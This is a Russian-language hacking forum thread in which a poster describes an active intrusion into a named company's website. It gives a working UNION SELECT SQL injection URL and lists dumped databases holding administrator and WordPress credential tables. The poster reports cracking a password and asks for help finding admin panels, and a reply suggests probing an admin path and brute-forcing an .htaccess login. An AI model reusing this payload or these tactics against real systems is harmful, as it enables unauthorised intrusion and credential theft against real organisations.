Вобщем столкнулся с интересным сайтом =) либо я где то ошибаюсь либо все так и есть! Вобщем есть SQL вот тут:
hidglobal.com/pr.php?id=-1000+UNION+SELECT+1,2,version(),4,5,6,7--
Версия mysql выше 5 и с помощью SIPT4 я прочитал бд(вот самое интересное):
Database [admin]
Table [administrators ( Rows)]
username
password
Database [blogpriv]
Table [wp_users ( Rows)]
ID
user_login
user_pass
user_nicename
user_email
user_url
user_registered
user_activation_key
user_status
display_name
Database [event_breakouts]
Table [admin ( Rows)]
admin_id
admin_name
admin_pwd
Database [hid_productselector]
Table [hid_administrator ( Rows)]
administrator_username
administrator_password
нашел админку блога(вордпресс) /blog/wp_login.php из бд прочитал пасс, сбрутил его, ввел, а он не подходит =) и больше ничего из админок не нашел! =\ только еще что то order.hidglobal.com но и тут неудача =\ помогите разобраться, а то уже голова кругом идет
Kraneg, http://www.hidglobal.com/admin/ - доступ запрещен, значит там что то есть интересное аля админка. Поищи.
https://orders.hidcorp.com/ - тут похоже авторизация по .htaccess, значит или брут или голяк.
2ip - часто меня подводит, он скорей как дополнительная помощь